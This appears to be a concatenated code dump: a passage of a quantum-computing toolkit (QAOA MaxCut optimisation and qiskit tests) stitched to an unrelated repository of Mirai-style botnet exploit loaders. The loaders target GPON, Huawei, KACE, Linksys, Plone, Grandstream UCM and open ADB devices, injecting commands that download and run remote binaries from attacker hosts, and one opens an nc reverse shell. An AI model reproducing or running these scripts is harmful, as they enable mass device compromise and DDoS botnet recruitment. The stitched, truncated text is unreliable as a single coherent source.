from variationaltoolkit import ObjectiveWrapper
from qiskit.optimization.ising.max_cut import get_operator as get_maxcut_operator
from libensemble.tools import parse_args, add_unique_random_streams
# from libensemble.comms.logs import LogConfig
# import uuid
# logs = LogConfig.config
# libE_run_id = uuid.uuid4()
# logs.stat_filename = "libE_stats_" + str(libE_run_id) + ".log"
# logs.filename = "ensemble_" + str(libE_run_id) + ".log"
nworkers, is_master, libE_specs, _ = parse_args()
libE_specs['save_H_and_persis_on_abort'] = False
libE_specs['disable_log_files'] = True
def optimize_obj(obj_val, num_parameters, ub=None, lb=None, sim_max=None):
def sim_func(H, gen_info, sim_specs, libE_info):
del libE_info # Ignored parameter
batch = len(H['x'])
O = np.zeros(batch, dtype=sim_specs['out'])
for i, x in enumerate(H['x']):
O['f'][i] = obj_val(x)
return O, gen_info
script_name = os.path.splitext(os.path.basename(__file__))[0]
#State the objective function, its arguments, output, and necessary parameters (and their sizes)
sim_specs = {
'sim_f':
sim_func, # This is the function whose output is being minimized
'in': ['x'], # These keys will be given to the above function
'out': [
('f',
float), # This is the output from the function being minimized
],
}
gen_out = [
('x', float, num_parameters),
('x_on_cube', float, num_parameters),
('sim_id', int),
('local_pt', bool),
('local_min', bool),
]
np.random.seed(0)
# State the generating function, its arguments, output, and necessary parameters.
gen_specs = {
'gen_f': gen_f,
'in': ['x', 'f', 'local_pt', 'sim_id', 'returned', 'x_on_cube', 'local_min'],
#'mu':0.1, # limit on dist_to_bound: everything closer to bound than mu is thrown out
'out': gen_out,
'user':{
'lb': lb,
'ub': ub,
'initial_sample_size': 20, # num points sampled before starting opt runs, one per worker
# 'localopt_method': 'scipy_COBYLA',
# 'scipy_kwargs': {'tol': 1e-10, 'options': {'disp':True, 'maxiter': 100}},
'localopt_method': 'LN_COBYLA',
'sample_points': np.atleast_2d(np.random.uniform(lb, ub, (20,len(lb)))),
'run_max_eval':100,
'ftol_rel':1e-10,
'xtol_rel':1e-10,
'num_pts_first_pass': nworkers-1,
'max_active_runs': 2,
'periodic': True,
}
}
# Tell libEnsemble when to stop
exit_criteria = {'sim_max': sim_max}
persis_info = add_unique_random_streams({}, nworkers + 1)
alloc_specs = {'alloc_f': alloc_f, 'out': [('given_back', bool)], 'user': {}}
H, persis_info, flag = libE(
sim_specs,
gen_specs,
exit_criteria,
persis_info=persis_info,
libE_specs=libE_specs,
alloc_specs=alloc_specs)
if MPI.COMM_WORLD.Get_rank() == 0:
return (H, persis_info)
def maxcut_obj(x,G):
cut = 0
for i, j in G.edges():
if x[i] != x[j]:
# the edge is cut
cut -= 1
return cut
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
"--maxiter", type = int,
default = "300",
help = "number of iterations, default is 100")
parser.add_argument(
"--nnodes", type = int,
default = "6",
help = "number of nodes in the 3-regular graph")
parser.add_argument(
"-p", type = int,
default = "10",
help = "maximum depth to explore")
parser.add_argument(
"--graph-generator-seed", type = int,
default = "1",
help = "seed for random graph generation")
args = parser.parse_args()
# generate objw
# pass to libE
#G = nx.random_regular_graph(3, args.nnodes, seed=args.graph_generator_seed)
# For testing purposes, hardcode Peterson graph
elist = [
[0,1],[1,2],[2,3],[3,4],[4,0],
[0,5],[1,6],[2,7],[3,8],[4,9],
[5,7],[5,8],[6,8],[6,9],[7,9]
]
G=nx.OrderedGraph()
G.add_edges_from(elist)
w = nx.adjacency_matrix(G)
obj_f_cut = partial(maxcut_obj, G=G)
C, _ = get_maxcut_operator(w)
lb = np.array([0, 0] * args.p)
ub = np.array([np.pi / 2] * args.p + [np.pi] * args.p)
obj_w = ObjectiveWrapper(
obj_f_cut,
varform_description={'name':'QAOA', 'p':args.p, 'cost_operator':C, 'num_qubits':G.number_of_nodes()},
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'statevector_simulator'},
execute_parameters={})
assert(obj_w.num_parameters == 2*args.p)
t = optimize_obj(obj_w.get_obj(), obj_w.num_parameters, ub=ub, lb=lb, sim_max=args.maxiter)
# if is_master:
# #outpath = f"/zfs/safrolab/users/rshaydu/quantum/data/nasa_2020/libe_optimized_schedules/n_{args.nnodes}_p_{args.p}_gseed_{args.graph_generator_seed}.p"
# outpath = f"/zfs/safrolab/users/rshaydu/quantum/data/nasa_2020/libe_optimized_schedules/petersen_p_{args.p}.p"
# print(f"Found solution {min(t[0]['f'])}, saving to {outpath}")
# pickle.dump(t, open(outpath, "wb"))
```
#### File: variationaltoolkit/test/test_objectives.py
```python
import unittest
import numpy as np
import networkx as nx
from variationaltoolkit.objectives import modularity_obj
class TestObjectives(unittest.TestCase):
def test_modularity_obj(self):
w = np.array([[0,1,1,0,0,0],[1,0,1,0,0,0],[1,1,0,1,0,0],[0,0,1,0,1,1],[0,0,0,1,0,1],[0,0,0,1,1,0]])
G = nx.from_numpy_matrix(w)
B = nx.modularity_matrix(G, nodelist = list(range(6)))
m = G.number_of_edges()
x = np.array([0,0,0,1,1,1])
N = 1
y = np.array([0,0,0,1,1,0,1,1,1,1,1,1])
M = 2
self.assertTrue(abs(modularity_obj(x, N, B, m) + 10/28) < 1e-5)
self.assertTrue(abs(modularity_obj(y, M, B, m) + 9/98) < 1e-5)
if __name__ == '__main__':
unittest.main()
```
#### File: variationaltoolkit/test/test_utils.py
```python
import unittest
import numpy as np
import networkx as nx
import time
from functools import partial
from qiskit import QuantumCircuit, Aer, execute
from qiskit.optimization.ising.max_cut import get_operator as get_maxcut_operator
from variationaltoolkit.utils import obj_from_statevector, precompute_obj, cost_operator_to_vec, solution_density, get_max_independent_set_operator, check_cost_operator
from variationaltoolkit.objectives import maxcut_obj
from variationaltoolkit.endianness import state_num2str
def local_pickleable_maxcut_obj(x, G=None):
cut = 0
for i, j in G.edges():
if x[i] != x[j]:
# the edge is cut
cut -= 1
return cut
class TestUtils(unittest.TestCase):
def setUp(self):
elist = [[0,1], [0,2], [0,3], [1,4], [1,5], [2,4], [2,5], [3,4], [3,5]]
self.G=nx.OrderedGraph()
self.G.add_edges_from(elist)
self.obj = partial(local_pickleable_maxcut_obj, G=self.G)
def test_obj_from_statevector(self):
sv = np.zeros(2**6)
sv[11] = 1
self.assertTrue(np.isclose(obj_from_statevector(sv, self.obj), -5))
def test_obj_from_statevector_complex(self):
sv = np.zeros(2**6, dtype=complex)
sv[11] = 1j
self.assertTrue(np.isclose(obj_from_statevector(sv, self.obj), -5))
def test_precompute_obj(self):
G = nx.OrderedGraph()
elist = [[0,1],[1,2],[1,3],[2,3]]
G.add_edges_from(elist)
N = G.number_of_nodes()
w = nx.adjacency_matrix(G, nodelist=range(N))
obj = partial(maxcut_obj, w=w)
qc = QuantumCircuit(N,N)
qc.x([0])
backend = Aer.get_backend('statevector_simulator')
sv = execute(qc, backend=backend).result().get_statevector()
precomputed = precompute_obj(obj, N)
self.assertEqual(len(precomputed[np.where(sv)]), 1)
self.assertEqual(obj_from_statevector(sv, obj), precomputed[np.where(sv)][0])
def test_precompute_obj_cost_ham(self):
w = nx.adjacency_matrix(self.G, nodelist=range(self.G.number_of_nodes()))
C, offset = get_maxcut_operator(w)
cost_diag = cost_operator_to_vec(C, offset)
precomputed = precompute_obj(self.obj, self.G.number_of_nodes())
self.assertTrue(np.allclose(cost_diag, precomputed))
def test_solution_density(self):
G = nx.generators.classic.complete_graph(8)
obj_f = partial(local_pickleable_maxcut_obj, G=G)
density = solution_density(obj_f, G.number_of_nodes())
self.assertEqual(density, 0.2734375)
def test_get_max_independent_set_operator(self):
n = 4
def obj(x):
return -sum(x)
C, offset = get_max_independent_set_operator(n)
check_cost_operator(C, obj, offset=offset)
if __name__ == '__main__':
unittest.main()
```
#### File: variationaltoolkit/test/test_varform.py
```python
import unittest
import numpy as np
import networkx as nx
import importlib.util
import sys
from itertools import product
from variationaltoolkit import VarForm
from variationaltoolkit.utils import mact, get_max_independent_set_operator
from qiskit.aqua.components.variational_forms import RYRZ
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit.circuit import Parameter
from qiskit.optimization.ising.max_cut import get_operator as get_maxcut_operator
# a recipe for conditional import from https://docs.python.org/3/library/importlib.html#checking-if-a-module-can-be-imported
_mpsspec = importlib.util.find_spec('mpsbackend')
skip_mpsbackend = ('mpsbackend' not in sys.modules) and (_mpsspec is None)
class TestVarForm(unittest.TestCase):
def setUp(self):
self.varform_description = {'name':'RYRZ', 'num_qubits':5, 'depth':1}
def test_import_ryrz(self):
var_form = VarForm(varform_description=self.varform_description)
self.assertIsInstance(var_form.var_form, RYRZ)
def test_ryrz_qasm_simulator(self):
var_form = VarForm(varform_description=self.varform_description)
parameters = np.random.uniform(0, np.pi, var_form.num_parameters)
execute_parameters={'shots':100}
resstrs = var_form.run(parameters,
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'qasm_simulator'},
execute_parameters=execute_parameters)
self.assertEqual(len(resstrs), execute_parameters['shots'])
self.assertTrue(all(len(x) == self.varform_description['num_qubits'] for x in resstrs))
def test_qaoa_maxcut(self):
w = np.array([[0,1,1,0],[1,0,1,1],[1,1,0,1],[0,1,1,0]])
C, offset = get_maxcut_operator(w)
var_form = VarForm(varform_description={'name':'QAOA', 'p':2, 'cost_operator':C, 'num_qubits':4})
parameters = np.random.uniform(0, np.pi, var_form.num_parameters)
execute_parameters={'shots':100}
resstrs = var_form.run(parameters,
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'qasm_simulator'},
execute_parameters=execute_parameters)
self.assertEqual(len(resstrs), execute_parameters['shots'])
self.assertTrue(all(len(x) == 4 for x in resstrs))
def test_qaoa_mixer(self):
w = np.array([[0,1,1,0],[1,0,1,1],[1,1,0,1],[0,1,1,0]])
C, offset = get_maxcut_operator(w)
# build initial state circuit
initial_state_circuit = QuantumCircuit(4)
initial_state_circuit.u2(0, np.pi, range(4))
var_form_operator_mix = VarForm(varform_description={'name':'QAOA', 'p':2, 'cost_operator':C, 'num_qubits':4})
var_form_circuit_mix = VarForm(varform_description={'name':'QAOA', 'p':2, 'cost_operator':C, 'num_qubits':4, 'use_mixer_circuit':True, 'initial_state_circuit':initial_state_circuit})
self.assertEqual(var_form_operator_mix.num_parameters, var_form_circuit_mix.num_parameters)
parameters = np.random.uniform(0, np.pi, var_form_operator_mix.num_parameters)
sv_operator_mix = var_form_operator_mix.run(parameters,
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'statevector_simulator'},
execute_parameters={})
sv_circuit_mix = var_form_circuit_mix.run(parameters,
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'statevector_simulator'},
execute_parameters={})
# check that the two statevectors are equal up to global phase
phase_diff = sv_circuit_mix / sv_operator_mix
self.assertTrue(np.allclose(phase_diff, np.full(phase_diff.shape, phase_diff[0])))
def test_qaoa_pass_mixer(self):
w = np.array([[0,1,1,0],[1,0,1,1],[1,1,0,1],[0,1,1,0]])
C, offset = get_maxcut_operator(w)
var_form_operator_mix = VarForm(varform_description={'name':'QAOA', 'p':2, 'cost_operator':C, 'num_qubits':4})
# build initial state circuit
initial_state_circuit = QuantumCircuit(4)
initial_state_circuit.u2(0, np.pi, range(4))
# build transverse field mixer circuit
mixer_circuit = QuantumCircuit(4)
beta = Parameter('beta')
for q1 in range(4):
mixer_circuit.h(q1)
mixer_circuit.rz(2*beta, q1)
mixer_circuit.h(q1)
# pass it to variational form
var_form_circuit_mix = VarForm(varform_description={'name':'QAOA', 'p':2, 'cost_operator':C, 'num_qubits':4, 'use_mixer_circuit':True, 'mixer_circuit':mixer_circuit, 'initial_state_circuit':initial_state_circuit})
self.assertEqual(var_form_operator_mix.num_parameters, var_form_circuit_mix.num_parameters)
parameters = np.random.uniform(0, np.pi, var_form_operator_mix.num_parameters)
sv_operator_mix = var_form_operator_mix.run(parameters,
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'statevector_simulator'},
execute_parameters={})
sv_circuit_mix = var_form_circuit_mix.run(parameters,
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'statevector_simulator'},
execute_parameters={})
# check that the two statevectors are equal up to global phase
phase_diff = sv_circuit_mix / sv_operator_mix
self.assertTrue(np.allclose(phase_diff, np.full(phase_diff.shape, phase_diff[0])))
def test_qaoa_max_independent_set(self):
elist = [[0,2],[0,4],[1,2],[1,4],[0,3],[1,3]]
G = nx.OrderedGraph()
G.add_edges_from(elist)
vertex_num = G.number_of_nodes()
w = nx.adjacency_matrix(G, nodelist=range(vertex_num))
C, offset = get_max_independent_set_operator(vertex_num)
# First, allocate registers
qu = QuantumRegister(vertex_num)
ancilla_for_multi_toffoli = QuantumRegister(vertex_num - 2)
ancilla_for_rx = QuantumRegister(1)
cu = ClassicalRegister(vertex_num)
# Mixer circuit
beta = Parameter('beta')
mixer_circuit = QuantumCircuit(qu, ancilla_for_multi_toffoli, ancilla_for_rx, cu)
for u in G.nodes():
mixer_circuit.barrier()
mact(mixer_circuit, list(qu[x] for x in G.neighbors(u)), ancilla_for_rx, ancilla_for_multi_toffoli)
mixer_circuit.mcrx(2 * beta, ancilla_for_rx, qu[u])
mixer_circuit.barrier()
mact(mixer_circuit, list(qu[x] for x in G.neighbors(u)), ancilla_for_rx, ancilla_for_multi_toffoli)
# Measurement circuit
measurement_circuit = QuantumCircuit(qu, ancilla_for_multi_toffoli, ancilla_for_rx, cu)
measurement_circuit.measure(qu, cu)
# pass it all to variational form
var_form_circuit_mix = VarForm(varform_description={
'name':'QAOA',
'p':2,
'cost_operator':C,
'num_qubits':vertex_num, 'use_mixer_circuit':True,
'mixer_circuit':mixer_circuit,
'measurement_circuit': measurement_circuit,
'qregs':[qu, ancilla_for_multi_toffoli, ancilla_for_rx, cu]})
parameters = np.random.uniform(0, np.pi, var_form_circuit_mix.num_parameters)
res = var_form_circuit_mix.run(parameters,
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'qasm_simulator'},
execute_parameters={'shots': 1000})
# check that all sampled strings are valid solutions
for x in res:
for i, j in product(set(np.where(reversed(x))[0]), repeat=2):
if i != j:
try:
self.assertTrue(not G.has_edge(i,j))
except AssertionError as e:
print(i,j,x)
raise e
@unittest.skipIf(skip_mpsbackend, "mpsbackend not found")
def test_ryrz_mpssimulator(self):
var_form = VarForm(varform_description=self.varform_description)
parameters = np.random.uniform(0, np.pi, var_form.num_parameters)
execute_parameters={'shots':100}
resstrs = var_form.run(parameters,
backend_description={'package':'mpsbackend'},
execute_parameters=execute_parameters)
self.assertEqual(len(resstrs), execute_parameters['shots'])
self.assertTrue(all(len(x) == self.varform_description['num_qubits'] for x in resstrs))
# TODO:
# check that runs on qiskit.Aer mps simulator and returns correct number of resstrs
# check that submits a job to IBMQ correctly
if __name__ == '__main__':
unittest.main()
```
#### File: variationaltoolkit/variationaltoolkit/endianness.py
```python
import numpy as np
def state_num2str(basis_state_as_num, nqubits):
return '{0:b}'.format(basis_state_as_num).zfill(nqubits)
def state_str2num(basis_state_as_str):
return int(basis_state_as_str, 2)
def state_reverse(basis_state_as_num, nqubits):
basis_state_as_str = state_num2str(basis_state_as_num, nqubits)
new_str = basis_state_as_str[::-1]
return state_str2num(new_str)
def get_adjusted_state(state):
nqubits = np.log2(state.shape[0])
if nqubits % 1:
raise ValueError("Input vector is not a valid statevector for qubits.")
nqubits = int(nqubits)
adjusted_state = np.zeros(2**nqubits, dtype=complex)
for basis_state in range(2**nqubits):
adjusted_state[state_reverse(basis_state, nqubits)] = state[basis_state]
return adjusted_state
```
#### File: variationaltoolkit/variationaltoolkit/varform.py
```python
import importlib.util
import sys
import numpy as np
# a recipe for conditional import from https://docs.python.org/3/library/importlib.html#checking-if-a-module-can-be-imported
_spec = importlib.util.find_spec('mpsbackend')
if 'mpsbackend' in sys.modules:
#raise RuntimeError("mpsbackend already in sys.modules. This means that someone imported mpsbackend before, braking the encapsulation. This should not happen.")
pass
elif _spec is not None:
# If you chose to perform the actual import ...
_module = importlib.util.module_from_spec(_spec)
sys.modules['mpsbackend'] = _module
_spec.loader.exec_module(_module)
from mpsbackend import MPSSimulator
print("Using mpsbackend")
else:
print(f"Can't find the mpsbackend module, continuing without it")
import qiskit
import qiskit.aqua.components.variational_forms as qiskit_variational_forms
from qiskit.aqua.algorithms.adaptive.qaoa.var_form import QAOAVarForm
from variationaltoolkit.variational_forms import QAOACircuitMixer
from .utils import execute_wrapper, check_and_load_accounts, contains_and_raised
class VarForm:
"""Variational Form wrapper"""
def __init__(self, varform_description=None, problem_description=None):
"""Constructor.
Args:
varform_description (dict) : Specifies the variational form.
Must specify name
For hardware-efficient variational forms,
must match the __init__ of desired variational form.
For QAOA, must specify p, cost_operator
optional: mixer_operator
problem_description (dict) : Specifies the problem (maxcut, modularity, ising).
Optional for hardware-efficient variational forms.
Must have field 'name'.
"""
if varform_description is None:
raise ValueError(f"varform_description is required")
self.num_qubits = varform_description['num_qubits']
if varform_description['name'] == 'QAOA':
if contains_and_raised(varform_description, 'use_mixer_circuit'):
varform_parameters = {k : v for k,v in varform_description.items() if k != 'name' and k != 'num_qubits' and k != 'use_mixer_circuit'}
self.var_form = QAOACircuitMixer(**varform_parameters)
else:
varform_parameters = {k : v for k,v in varform_description.items() if k != 'name' and k != 'num_qubits'}
self.var_form = QAOAVarForm(**varform_parameters)
else:
varform_parameters = {k : v for k,v in varform_description.items() if k != 'name'}
self.var_form = getattr(qiskit_variational_forms, varform_description['name'])(**varform_parameters)
self.num_parameters = self.var_form._num_parameters
self.varform_description = varform_description
self.problem_description = problem_description
def run(self, parameters, backend_description=None, execute_parameters=None):
"""Runs the variational form
Args:
parameters (np.array) : variational parameters to pass to the form
backend_description (dict) : Specifies backend parameters.
TBA
For qiskit, must specify TBA
execute_parameters (dict) : Parameters passed to execute function
"""
if backend_description is None:
raise ValueError(f"backend_description is required")
if backend_description['package'] == 'qiskit':
if backend_description['provider'] == 'Aer':
provider = qiskit.Aer
else:
check_and_load_accounts()
provider = qiskit.IBMQ.get_provider(backend_description['provider'])
backend = provider.get_backend(backend_description['name'])
elif backend_description['package'] == 'mpsbackend':
backend = MPSSimulator()
circuit = self.var_form.construct_circuit(parameters)
if ((backend_description['package'] == 'qiskit' and 'statevector' not in backend_description['name'])
or (hasattr(self.var_form, '_measurement_circuit') and self.var_form._measurement_circuit is not None)):
if not circuit.cregs:
c = qiskit.ClassicalRegister(self.num_qubits, name='c')
circuit.add_register(c)
circuit.measure(circuit.qregs[0], circuit.cregs[0])
job = execute_wrapper(circuit, backend, **execute_parameters)
result = job.result()
if backend_description['package'] == 'qiskit' and 'statevector' in backend_description['name']:
return result.get_statevector()
else:
if hasattr(result, 'get_resstrs'):
return result.get_resstrs()
else:
resstrs = []
for k, v in result.get_counts().items():
for _ in range(v):
resstrs.append(np.array([int(x) for x in k]))
return resstrs
``` |
{
"source": "1ucif3r/DDOS-th31ucif3r",
"score": 2
} |
#### File: Botnets/Exploits/gpon.py
```python
import sys, socket, time, os, ssl
from Queue import *
#from multiprocessing.dummy import Pool as ThreadPool
#from multiprocessing import Process
from threading import Thread
from sys import stdout
if len(sys.argv) < 2:
print "Usage: python "+sys.argv[0]+" <list>"
sys.exit()
port = 443
buf = 4096
count = 0
queue = Queue()
post_data = "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=$(busybox+wget+http://172.16.58.3/Black1.sh+-O+->+/dev/r;sh+/dev/r)&ipv=0\r\n"
headers = "POST /GponForm/diag_Form?style/ HTTP/1.1\r\nHost: 192.168.0.1:443\r\nUser-Agent: curl/7.3.2\r\nAccept: */*\r\nxAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
#headers = "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 192.168.0.1:443\r\nUser-Agent: curl/7.3.2\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
i = 0
ips = open(sys.argv[1], "r").readlines()
def gpwn(host):
global i
host = host.strip("\n")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = ssl.wrap_socket(sock)
s.settimeout(3)
s.connect((host, port))
s.send(headers)
time.sleep(5)
print "\x1b[1;35m[\x1b[1;36mGPON\x1b[1;35m] \x1b[1;37m- \x1b[1;35m[\x1b[1;32m%s\x1b[1;35m] \x1b[1;37m- \x1b[1;35m[\x1b[1;32mDEPLOYING\x1b[1;35m]" % (host)
resp = s.recv(buf).strip()
if "200 OK" in resp:
i += 1
s.close()
except:
pass
return
def load_to_queue():
global count
for line in ips:
count += 1
line = line.strip("\r\n")
sys.stdout.write("\r[%d] Added to queue" % (count))
sys.stdout.flush()
queue.put(line)
sys.stdout.write("\n")
def main():
load_to_queue()
i = 0
while i < count:
i += 1
try:
ip = queue.get()
f = Thread(target=gpwn, args=(ip,))
f.start()
queue.task_done()
except KeyboardInterrupt:
os.kill(os.getpid(),9)
except Exception as i:
print i
pass
if __name__ == "__main__":
main()
```
#### File: Botnets/Exploits/huawei.py
```python
import threading, sys, time, random, socket, re, os, struct, array, requests
from threading import Thread
from time import sleep
import requests
from requests.auth import HTTPDigestAuth
from decimal import *
ips = open(sys.argv[1], "r").readlines()
cmd1 = "/bin/busybox wget -g 172.16.58.3 -l /tmp/mips -r /mips"
cmd2 = "chmod 777 /tmp/mips;/tmp/mips; rm -rf /tmp/mips"
payload1 = "<?xml version=\"1.0\" ?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n <NewStatusURL>$(172.16.58.3)</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n </s:Body>\n </s:Envelope>"
payload2 = "<?xml version=\"1.0\" ?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n <NewStatusURL>$(172.16.58.3)</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n </s:Body>\n </s:Envelope>"
class rtek(threading.Thread):
def __init__ (smips, ip):
threading.Thread.__init__(smips)
smips.ip = str(ip).rstrip('\n')
def run(smips):
try:
print "[Huawei] Loading - " + smips.ip
url = "http://" + smips.ip + ":37215/ctrlt/DeviceUpgrade_1"
requests.post(url, timeout=3, data=payload1, auth=HTTPDigestAuth('dslf-config', 'admin'))
requests.post(url, timeout=2.5, data=payload2, auth=HTTPDigestAuth('dslf-config', 'admin'))
except Exception as e:
pass
for ip in ips:
try:
n = rtek(ip)
n.start()
time.sleep(0.03)
except:
pass
```
#### File: Botnets/Exploits/kace.py
```python
import threading
import sys
import time
import random
import socket
import subprocess
import re
import os
import struct
import array
import requests
from threading import Thread
from time import sleep
from requests.auth import HTTPDigestAuth
from decimal import *
ips = open(sys.argv[1], "r").readlines()
def run(cmd):
subprocess.call(cmd, shell=True)
class k-1000(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
try:
print "--> " + self.ip
url = "http://" + self.ip + "/service/krashrpt.php?kuid=\x60id | wget http://r.0.0.t.s.3.c/zen.sh; chmod 777 zen.sh; sh Ares.sh; rm -rf zen.sh\x60"
requests.get(url, timeout=3)
except Exception as e:
pass
for ip in ips:
try:
r = k-1000(ip)
r.start()
time.sleep(0.03)
except:
pass
```
#### File: Botnets/Exploits/linksys.py
```python
import threading, sys, time, random, socket, subprocess, re, os, struct, array, requests
from threading import Thread
from time import sleep
import requests
from requests.auth import HTTPDigestAuth
from decimal import *
ips = open(sys.argv[1], "r").readlines()
url_data = {
"submit_button": "",
"change_action": "",
"action": "",
"commit": "0",
"ttcp_num": "2",
"ttcp_open": "2",
"ttcp_size": "2",
"ttcp_ip": "-h `cd /tmp; rm -rf kakeii.mpsl; wget http://8.8.8.8/Lpjin23/kakeii.mpsl; chmod 777 kakeii.mpsl; ./kakeii.mpsl Bluesclues`",
"StartEPI": "1",
}
class rtek(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
try:
print "[LINKSYS] Loading - " + self.ip
url = "http://"+self.ip+":8080/tmUnblock.cgi"
requests.post(url, data=url_data, timeout=3)
requests.get(url, timeout=3)
except Exception as e:
pass
for ip in ips:
try:
n = rtek(ip)
n.start()
time.sleep(0.03)
except:
pass
```
#### File: Botnets/Exploits/plone.py
```python
import threading, random, socket, time, sys, requests, re, os, subprocess
if len(sys.argv) < 3:
print "\033[37mUsage: python "+sys.argv[0]+" <list> <port>\033[37m"
sys.exit()
ip = "1.3.3.7" # BINS LOCATION IP
vulns = open(sys.argv[1], "r").readlines()
port = int(sys.argv[2]) # PORTS 80 8080 8081 8083
class send_payload(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
try:
url = "http://" + self.ip + ":"+port+"/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget http://" + ip + "/zen.sh; curl -O http://" + ip + "/zen.sh; chmod +x zen.sh; ./zen.sh"
requests.get(url, timeout=8)
print "[PLONE] Loading: %s"%(self.ip)
except:
pass
for IP in vulns:
try:
ip = "".join(IP)
ip = ip.replace("\n", "")
t = send_payload(ip)
t.start()
time.sleep(0.03)
except:
pass
```
#### File: Botnets/Exploits/ucm.py
```python
import os
import re
import sys
import json
import argparse
import requests
import threading
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# UCM Exploit Loader
#$top_parser = argparse.ArgumentParser(description='')
#$top_parser.add_argument('--rhost', action="store", dest="rhost",
#$required=True, help="The remote host to connect to")
#$top_parser.add_argument('--rport', action="store", dest="rport", type=int,
#$help="The remote port to connect to", default=8089)
#$top_parser.add_argument('--lhost', action="store", dest="lhost",
#$required=True, help="The local host to connect back to")
#$top_parser.add_argument('--lport', action="store", dest="lport", type=int,
#$help="The local port to connect back to", default=1270)
#$args = top_parser.parse_args()
class Loader(object):
def infect(self, adress: str):
url = 'https://' + adress + ':' + "8089" + '/cgi'
print('[+] Sending getInfo request to ', url)
try:
resp = requests.post(url=url, data='action=getInfo', verify=False)
except Exception:
print('[-] Error connecting to remote target')
sys.exit(1)
if resp.status_code != 200:
print('[-] Did not get a 200 OK on getInfo request')
sys.exit(1)
if resp.text.find('{ "response":') != 0:
print('[-] Unexpected response')
sys.exit(1)
try:
parsed_response = json.loads(resp.text)
except Exception:
print('[-] Unable to parse json response')
sys.exit(1)
print('[+] Remote target info: ')
print('\t-> Model: ', parsed_response['response']['model_name'])
print('\t-> Version: ', parsed_response['response']['prog_version'])
match = re.match('^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)$',
parsed_response['response']['prog_version'])
if not match:
print('[-] Failed to extract the remote targets version')
sys.exit(1)
major = int(match[1])
minor = int(match[2])
point = int(match[3])
patch = int(match[4])
if (major > 1) or (major == 1 and minor > 0) or (major == 1 and minor == 0
and point > 19) or (major == 1 and minor == 0 and point == 19 and patch >=
20):
print('[-] Unaffected version')
sys.exit(1)
else:
print('[+] Vulnerable version!')
print("[+] loaded, %s" %(adress))
try:
exploit = "admin\' or 1=1--`;cd /var/; wget http://172.16.31.10/skid.arm6 ; chmod 777 skid.arm6 ; ./skid.arm6 Jaws" #arm7
exploit2 = 'admin\' or 1=1--`;`nc${IFS}' + "172.16.31.10" + '${IFS}' + "1270" + '${IFS}-e${IFS}/bin/sh`;`'
resp = requests.post(url=url,
data='action=sendPasswordEmail&user_name=' + exploit, verify=False)
except Exception as err:
print('[-] Failed to send payload')
sys.exit(1)
if resp.status_code != 200:
print('[-] Did not get a 200 OK on sendPasswordEmail request')
sys.exit(1)
try:
parsed_response = json.loads(resp.text)
except Exception:
print('[-] Unable to parse json response')
sys.exit(1)
if parsed_response['status'] == 0:
print('[+] Success! Clean exit.')
else:
print('[-] Something bad happened.')
def __init__(self, adress: str):
self.infect(adress)
with open(sys.argv[1], "r") as f:
for item in f.readlines():
threading.Thread(target=Loader, args=(item.rstrip(), )).start()
```
#### File: MIRAI SPLOITS/ADB-ANDROID/android.py
```python
import sys
import threading
import requests
import os
import socket
import time
from Queue import *
from threading import Thread
if len(sys.argv) < 3:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [list] [output]")
ips = open(sys.argv[1], "r").readlines()
output = sys.argv[2]
queue = Queue()
queue_count = 0
info = open(str(sys.argv[1]),'a+')
def rtek(ip):
ip = str(ip).rstrip("\n")
try:
adb = socket.socket()
adb.settimeout(5)
adb.connect((ip,5555))
os.system("echo "+ip+" >> "+output+"")
os.system("adb connect "+ip+"")
time.sleep(3);
os.system("adb -s "+ip+":5555 shell \"cd /data/local/tmp; wget http://172.16.58.3/a.sh; chmod 777 a.sh; sh a.sh; rm -rf a.sh\"")
adb.close()
except Exception:
adb.close()
pass
def main():
global queue_count
for line in ips:
line = line.strip("\r")
line = line.strip("\n")
queue_count += 1
sys.stdout.write("\r[%d] Added to queue" % (queue_count))
sys.stdout.flush()
queue.put(line)
sys.stdout.write("\n")
i = 0
while i != queue_count:
i += 1
try:
input = queue.get()
thread = Thread(target=rtek, args=(input,))
thread.start()
time.sleep(0.05)
except KeyboardInterrupt:
os.kill(os.getpid(), 9)
thread.join()
return
if __name__ == "__main__":
main()
```
#### File: MIRAI SPLOITS/HNAP UPNP/hnap.py
```python
